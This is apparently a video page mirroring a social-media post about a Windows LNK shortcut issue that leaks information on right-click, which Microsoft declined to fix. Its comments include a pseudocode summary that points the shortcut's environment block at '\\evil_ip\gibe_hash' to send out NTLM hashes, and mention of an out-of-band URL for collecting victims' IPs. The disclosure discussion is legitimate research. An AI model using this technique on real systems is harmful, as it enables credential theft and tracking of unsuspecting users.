Video yükleniyor...

Video Yüklenemedi

Ana Sayfaya Dön

A quick writeup on potential security issue of Windows LNK that I reported to MSRC last month. They decided to not fix due to relying on MOTW. In the blog I included the proof of concept. All you have to do is to Right-Click and get Info Disclosure :)

25,240 görüntüleme • 1 yıl önce •via X (Twitter)

11 Yorum

sixtyvividtails profil fotoğrafı
sixtyvividtails1 yıl önce

Nice seeing actual dig into details of .LNK structure! tag/TLDR: lnk.header.flags |= HAS_EXP_STRING; 🤭 lnk.envarBlock := "\\evil_ip\gibe_hash" then right-click to sendout the ntlm hash

nafiez profil fotoğrafı
nafiez1 yıl önce

Thanks 🫡

WAGMI | Crypto, DeFi & Web3 News profil fotoğrafı
WAGMI | Crypto, DeFi & Web3 News2 yıl önce

"My friends think I'm a crypto genius, (I'm not) it's because I read WAGMI’s weekly newsletter (and they have no idea it exists)" - Every Crypto Degen

I am Jakoby profil fotoğrafı
I am Jakoby1 yıl önce

I did something similar but I passed an http oob url and used it to collect their ip address, geolocation, and finger print info This is significantly more severe and I am honestly shocked they decided not to fix it

nafiez profil fotoğrafı
nafiez1 yıl önce

That sounds awesome! Have you write or publish anything about the stuff you work on? Yeah too bad they didn’t treat this as security issue since MOTW did the protection, according to them :-)

ClearSky Cyber Security profil fotoğrafı
ClearSky Cyber Security1 yıl önce

Open since June 24

nafiez profil fotoğrafı
nafiez1 yıl önce

The description looks similar however in your advisory seems to tie with CVE-2024-43451. How come this still not fix for the Right-Click? Any thoughts?

jcatblackhat profil fotoğrafı
jcatblackhat1 yıl önce

TAG: PoC

Jean profil fotoğrafı
Jean1 yıl önce

What's the app you use for function tracing?

nafiez profil fotoğrafı
nafiez1 yıl önce

I’m using Rohitab API Monitor

Bruno profil fotoğrafı
Bruno1 yıl önce

@BriPwn

Benzer Videolar